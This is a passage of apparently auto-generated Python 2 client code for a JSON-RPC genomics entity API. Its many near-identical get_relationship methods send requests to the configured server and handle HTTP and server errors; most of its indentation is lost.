# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasProvidedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasProvidedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublishedAssociation(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublishedAssociation',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssociationPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssociationPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublishedExperiment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublishedExperiment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ExperimentPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ExperimentPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublishedProtocol(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublishedProtocol',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ProtocolPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ProtocolPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulogHasRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulogHasRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulonIsInRegolog(self, ids, from_fields, rel_fields, to_fields):
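        # Note: 'Regolog' (sic) matches the server-side method name in
        # arg_hash below, so the spelling is preserved here.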
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulonIsInRegolog',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulomeHasGenome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulomeHasGenome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GenomeIsInRegulome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GenomeIsInRegulome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulomeHasRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulomeHasRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulonIsInRegolome(self, ids, from_fields, rel_fields, to_fields):
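        # Note: 'Regolome' (sic) matches the server-side method name in
        # arg_hash below, so the spelling is preserved here.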
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulonIsInRegolome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulomeSource(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulomeSource',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_CreatedRegulome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_CreatedRegulome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulonHasOperon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulonHasOperon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OperonIsInRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OperonIsInRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleAveragedFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleAveragedFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleContactPerson(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleContactPerson',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PersonPerformedSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PersonPerformedSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleHasAnnotations(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleHasAnnotations',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AnnotationsForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AnnotationsForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleInSeries(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleInSeries',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SeriesWithSamples(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SeriesWithSamples',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleMeasurements(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleMeasurements',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_MeasurementInSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_MeasurementInSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SamplesInReplicateGroup(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SamplesInReplicateGroup',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ReplicateGroupsForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ReplicateGroupsForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SeriesPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SeriesPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublicationsForSeries(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublicationsForSeries',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Shows(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Shows',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
